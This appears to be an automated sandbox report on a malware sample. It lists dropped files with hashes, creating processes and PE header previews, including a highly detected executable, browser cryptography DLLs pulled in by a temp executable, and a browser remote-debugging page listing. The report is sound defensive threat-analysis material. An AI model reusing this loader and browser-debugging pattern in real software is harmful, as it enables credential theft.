Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5bb97.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5bca0.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5bd1d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5bd3d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
MD5:	265DB1C9337422F9AF69EF2B4E1C7205
SHA1:	3E38976BB5CF035C75C9BC185F72A80E70F41C2E
SHA-256:	7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
SHA-512:	3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\dc011966-3131-4ac6-9f8b-a39928294ba9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44623
Entropy (8bit):	6.0963395825190885
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBRwuehDO6vP6Os1IwAvDOzv8+cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEZ6M1chu3VlXr4CRo1
MD5:	7AE36465F7D507DA8E6FF0976DEA24DF
SHA1:	020527D3BDB3D8B319E8C97C17996FB0E62839E1
SHA-256:	F3ACA4F13AB05E57F7F3250CA009A8366313B6BE0DBF359CAA878329DFDA6EB7
SHA-512:	B0328573A487F0FD11F7C026CEB2BD61BCA1F14357A931631B6D12BD2E906273EE867254577068B26BC7073F53B46119EF59EFE5019C65755D5EB89428D4EAC6
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e5a4f0fc-60d7-4191-99cd-76970175deb9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44623
Entropy (8bit):	6.096668174832137
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBRwuehDO6vP6Os1c3C6tpEpEF7ScGoup1Xl3jVzXq:z/Ps+wsI7ynEZ6MXchu3VlXr4CRo1
MD5:	9B7486511E8567F8FDF78617FDD57BFE
SHA1:	FAA7148C65FED7DB4C32A5CF321DBB46251E1293
SHA-256:	206A43CE2CB50D58D49BBE0C2F87EBCEDAB74FEF690C10B8FDCAAC8A9C0C0D51
SHA-512:	8BE0D87DD14D4EF3D182587E78DEEE0947C1424E226F994DA4FE07237F910FD912EBB441B3E3EEFF5CD01CF5C41A3B75A3D9A53DB598DB785BEC20A002B548C1
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fed9fa5f-8045-42e5-9ff7-9e886593c8a3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.394234375067728
Encrypted:	false
SSDEEP:	96:6NnCD+7HCDcNnCYbC0NnCcMM9CcPNnCVyadgECVaNnC/YC/RNnCkDCp8NnC9WwCL:6N8+4cNJNXNyHN4tRNDI8NdvNz
MD5:	B27AB9E04ECE17F3C878983BE41F2668
SHA1:	9AC0513FD78A03EC5FD45B89BA82063960409A0F
SHA-256:	84B1E4334EE660CC2A289C5BDA55B3E6AA4ECFC32909801689F4912E544A4032
SHA-512:	B6A5F17367352FA6941E81AF3B1F143C391B40FA71EE482D8A731E544E0778C1FABF422906165598CCE05D8DA28A2811E3C989324F470BA555760C4BE1208CDB
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/95C7578AA51FE2F81DA11D7B0FC472A8",.. "id": "95C7578AA51FE2F81DA11D7B0FC472A8",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/95C7578AA51FE2F81DA11D7B0FC472A8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1A00FBB83EDF2BA5A9B05043E4909615",.. "id": "1A00FBB83EDF2BA5A9B05043E4909615",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1A00FBB83EDF2BA5A9B05043E4909615"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\legs[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	776832
Entropy (8bit):	7.8597230357066845
Encrypted:	false
SSDEEP:	12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXmAuuweJH9RKC6cmulcfJbBiv0V:pG+XeJH9Rp6RtfNLtcXeJH9Rp6RtfNLr
MD5:	75CF470500D65CE4411790E09E650806
SHA1:	91ACA1838BC6E3868D25E44308F58124B749167D
SHA-256:	F29A920DD390574C50DF03E8F909A8F81A1894AF912AF2D92A9BAF4B57CF1C04
SHA-512:	1C281FE53742A338BECB9AA4EFD2A7E418A66949A7F3D156440E02E2351548F6FF0EAD5D93AAE157509F57D0B4CC3584A9AB623C6446EA389B45B49D0DF85C48
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
